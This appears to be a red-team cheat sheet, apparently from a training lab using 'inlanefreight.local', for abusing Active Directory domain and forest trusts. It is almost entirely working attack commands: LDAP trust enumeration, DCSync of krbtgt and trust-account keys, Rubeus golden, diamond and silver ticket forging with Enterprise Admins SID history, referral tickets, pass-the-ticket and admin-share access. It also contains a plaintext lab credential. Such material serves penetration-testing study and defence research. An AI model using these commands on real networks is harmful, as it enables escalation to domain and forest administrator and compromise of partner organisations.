ldapsearch (objectClass=trustedDomain)
ldapsearch (objectClass=trustedDomain) --attributes trustPartner,trustDirection,trustAttributes,flatName
ldapsearch (samAccountType=805306370) --attributes samAccountName
# Output: sAMAccountName: PARTNER$
| Value | Meaning |
|---|---|
| 0 | TRUST_DIRECTION_DISABLED |
| 1 | TRUST_DIRECTION_INBOUND |
| 2 | TRUST_DIRECTION_OUTBOUND |
| 3 | TRUST_DIRECTION_BIDIRECTIONAL |
| Value | Flag | Description |
|---|---|---|
| 1 | TRUST_ATTRIBUTE_NON_TRANSITIVE | Non-transitive trust |
| 4 | TRUST_ATTRIBUTE_QUARANTINED_DOMAIN | SID filtering enabled |
| 8 | TRUST_ATTRIBUTE_FOREST_TRANSITIVE | Transitive between forests |
| 32 | TRUST_ATTRIBUTE_WITHIN_FOREST | Between domains in same forest |
| 64 | TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL | Between domains in different forests (SID filtering implied) |
When DA in child domain → escalate to Enterprise Admin in forest root.
dcsync dublin.inlanefreight.local DUBLIN\krbtgt
ldapsearch (objectClass=domain) --attributes objectSid
ldapsearch (objectClass=domain) --attributes objectSid --hostname ilf-dc-1.inlanefreight.local --dn DC=inlanefreight,DC=local
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<child-krbtgt-aes256> /user:Administrator /domain:dublin.inlanefreight.local /sid:<child-domain-sid> /sids:<parent-domain-sid>-519 /nowrap
Parameters:
/aes256- Child domain's krbtgt AES256 hash/user- User to impersonate/domain- Child domain FQDN/sid- Child domain SID/sids- Parent domain SID with -519 (Enterprise Admins RID)
Save to file:
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<hash> /user:Administrator /domain:dublin.inlanefreight.local /sid:<child-sid> /sids:<parent-sid>-519 /outfile:C:\Users\Attacker\Desktop\golden
kerberos_ticket_use C:\Users\Attacker\Desktop\golden
run klist
ls \\ilf-dc-1\c$
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /sids:<parent-domain-sid>-512 /krbkey:<child-krbtgt-aes256> /nowrap
You can access resources in the trusting domain.
ldapsearch (objectClass=trustedDomain) --attributes trustDirection,trustPartner,trustAttributes,flatName
# trustDirection: 1 = INBOUND = you're in trusted domain
ldapsearch (objectClass=foreignSecurityPrincipal) --attributes cn,memberOf --hostname partner.com --dn DC=partner,DC=com
Output shows SID from your domain that has access to trusting domain.
ldapsearch (objectSid=S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-XXXX)
ldapsearch (samAccountType=805306369) --attributes samAccountName --dn DC=partner,DC=com --hostname partner.com
Get inter-realm key:
make_token INLANEFREIGHT\bjohnson Passw0rd!
dcsync inlanefreight.local INLANEFREIGHT\PARTNER$
rev2self
Forge referral ticket:
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /user:jyoung /domain:INLANEFREIGHT.LOCAL /sid:<trusted-domain-sid> /id:<user-rid> /groups:513,1106,6102 /service:krbtgt/partner.com /rc4:<ntlm-hash> /nowrap
Request service ticket in trusting domain:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/par-jmp-1.partner.com /dc:par-dc-1.partner.com /ticket:<inter-realm-tgt> /nowrap
Inject and access:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<service-ticket>
run klist
ls \\par-jmp-1.partner.com\c$
You're on the "wrong" side - no direct access to trusted domain.
ldapsearch (objectClass=trustedDomain) --attributes trustDirection,trustPartner,trustAttributes,flatName
# trustDirection: 2 = OUTBOUND = you're in trusting domain
ldapsearch (objectClass=trustedDomain) --attributes name,objectGUID
# objectGUID: 288d9ee6-2b3c-42aa-bef8-959ab4e484ed
mimikatz lsadump::dcsync /domain:partner.com /guid:{288d9ee6-2b3c-42aa-bef8-959ab4e484ed}
[Out] = current key, [Out-1] = previous key
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:PARTNER$ /domain:INLANEFREIGHT.LOCAL /dc:ilf-dc-1.inlanefreight.local /rc4:<inter-realm-key> /nowrap
make_token INLANEFREIGHT\PARTNER$ FakePass
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<ticket>
run klist
ldapsearch (objectClass=domain) --dn DC=inlanefreight,DC=local --attributes name,objectSid --hostname inlanefreight.local
| Scenario | Trust Direction | Strategy |
|---|---|---|
| Child → Parent | Bidirectional | Golden ticket with Enterprise Admins SID |
| Trusted → Trusting | Inbound (1) | Find foreign principals, forge referral tickets |
| Trusting → Trusted | Outbound (2) | DCSync trust account, use as stepping stone |